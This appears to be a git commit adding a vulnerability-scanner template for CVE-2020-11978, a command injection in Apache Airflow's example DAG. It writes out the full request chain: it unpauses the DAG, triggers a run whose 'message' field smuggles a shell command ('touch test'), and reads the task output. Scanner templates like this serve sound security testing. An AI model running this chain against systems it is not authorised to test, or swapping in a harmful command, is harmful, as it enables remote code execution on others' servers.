Added CVE-2020-11978

2021-06-03 13:57:09 +05:30 · 2021-06-03 13:57:09 +05:30 · 6652b2ddb6
parent 7fac0067d0
commit 6652b2ddb6
1 changed files with 65 additions and 0 deletions
--- a/cves/2020/CVE-2020-11978.yaml
+++ b/cves/2020/CVE-2020-11978.yaml
@ -0,0 +1,65 @@
+id: CVE-2020-11978
+info:
+  name: Apache Airflow <= 1.10.10 - 'Example Dag' Remote Code Execution
+  author: pdteam
+  severity: high
+  description: An issue was found in Apache Airflow versions 1.10.10 and below. A remote code/command injection vulnerability was discovered in one of the example DAGs shipped with Airflow which would allow any authenticated user to run arbitrary commands as the user running airflow worker/scheduler (depending on the executor in use). If you already have examples disabled by setting load_examples=False in the config then you are not vulnerable.
+  reference: |
+        - https://github.com/pberba/CVE-2020-11978
+        - https://nvd.nist.gov/vuln/detail/CVE-2020-11978
+        - https://twitter.com/wugeej/status/1400336603604668418
+  tags: cve,cve2020,apache,airflow,rce
+
+requests:
+  - raw:
+      - |
+        GET /api/experimental/test HTTP/1.1
+        Host: {{Hostname}}
+        Connection: close
+        Accept-Encoding: gzip, deflate
+        Accept: */*
+
+      - |
+        GET /api/experimental/dags/example_trigger_target_dag/paused/false HTTP/1.1
+        Host: {{Hostname}}
+        Connection: close
+        Accept-Encoding: gzip, deflate
+        Accept: */*
+
+      - |
+        POST /api/experimental/dags/example_trigger_target_dag/dag_runs HTTP/1.1
+        Host: {{Hostname}}
+        Connection: close
+        Accept-Encoding: gzip, deflate
+        Accept: */*
+        Content-Length: 85
+        Content-Type: application/json
+
+        {"conf": {"message": "\"; touch test #"}}
+
+      - |
+        GET /api/experimental/dags/example_trigger_target_dag/dag_runs/{{exec_date}}/tasks/bash_task HTTP/1.1
+        Host: {{Hostname}}
+        Connection: close
+        Accept-Encoding: gzip, deflate
+        Accept: */*
+
+
+    extractors:
+      - type: regex
+        name: exec_date
+        part: body
+        group: 1
+        internal: true
+        regex:
+          - '"execution_date":"([0-9-A-Z:+]+)"'
+
+    req-condition: true
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl:
+          - 'contains(body_4, "operator":"BashOperator")'
+          - 'contains(all_headers_4, "application/json")'
+        condition: and
+